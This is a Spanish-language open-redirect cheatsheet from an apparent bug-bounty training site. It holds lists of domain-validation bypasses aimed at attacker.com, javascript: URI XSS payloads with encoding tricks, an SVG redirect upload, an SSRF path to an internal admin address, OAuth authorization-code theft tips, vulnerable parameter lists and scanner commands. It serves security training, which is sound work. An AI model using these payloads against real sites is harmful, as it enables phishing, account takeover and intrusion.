Nuevos labs cada semana — Accede a todos desde 5€/mes

>Inicio>Labs>Eventos>Creators>Ranking>Academy>Writeups>Precios
Iniciar SesiónCrear Cuenta
Academy·Cheatsheets

Cheatsheet Open Redirect

Redireccion abierta

Referencia rápida

  • Open redirect solo suele ser aceptado como P4/informativo - escalar siempre a XSS, SSRF u OAuth token theft
  • Probar javascript: URI en todos los parametros de redireccion para escalar a XSS
  • Combinar con OAuth: open redirect en redirect_uri permite robar authorization codes
  • En apps Electron, open redirect puede escalar a RCE si nodeIntegration esta habilitado

Bypass de validacion de dominio

Subdominio del dominio permitido

https://allowed_domain.attacker.com

Credentials en URL

https://allowed_domain@attacker.com

Fragment

https://attacker.com#allowed_domain

Query parameter

https://attacker.com?allowed_domain

Backslash

https://attacker.com\allowed_domain

Multiple slashes

http:///////////attacker.com

Backslash mixto

http:\\attacker.com

AMP redirect

https://google.com/amp/s/attacker.com

Escalacion a XSS (javascript: URI)

javascript: basico

javascript:alert(1)

Null byte bypass

java%00script:alert(1)

Newline bypass

java%0Ascript:alert(1)

Tab bypass

java	script:alert(1)

Double encoding

javascript://%250Aalert(1)

Whitespace + tab

%09Jav%09ascript:alert(document.domain)

Con dominio whitelisted

javascript://https://whitelisted.com/?z=%0Aalert(1)

jaVAscript con dominio

jaVAscript://whitelisted.com//%0d%0aalert(1);//

Payloads avanzados

Path parameter redirect a SSRFOpen redirect interno puede escalar a SSRF

/product/nextProduct?path=http://192.168.0.12:8080/admin

SVG file upload redirect

<?xml version="1.0" standalone="yes"?>
<svg onload="window.location='http://attacker.com'" xmlns="http://www.w3.org/2000/svg"></svg>

DOM-based redirectBuscar en JS: location.href = param

https://target.com/post?postId=4&url=https://attacker.com/

Encoded characters avanzado

%26%2302java%26%23115cript:alert(document.domain)

Parametros comunes vulnerables

Parametros de redireccionProbar cada parametro con URL del atacante

?next= ?url= ?redirect= ?redirect_uri= ?return= ?returnTo= ?continue= ?dest= ?destination= ?redir= ?go= ?forward= ?checkout_url= ?callback_url=

Parametros de login/logout

?login= ?logout= ?return_path= ?return_to= ?service=

Parametros de recursos

?image_url= ?src= ?link= ?location= ?uri= ?u=

Herramientas

Oralyzer

Scanner automatizado de open redirect que prueba multiples payloads

python3 oralyzer.py -l urls.txt

gau + grep

Busca URLs historicas con parametros potencialmente vulnerables

echo "target.com" | gau | grep -iE "(redirect|url|next|return|go)="

Contenido relacionado

Diccionario

Open Redirect / Redirección Abierta

Ver más

¿Listo para practicar?

Pon en práctica estos payloads en labs reales basados en reportes de bug bounty.

Ver labs de práctica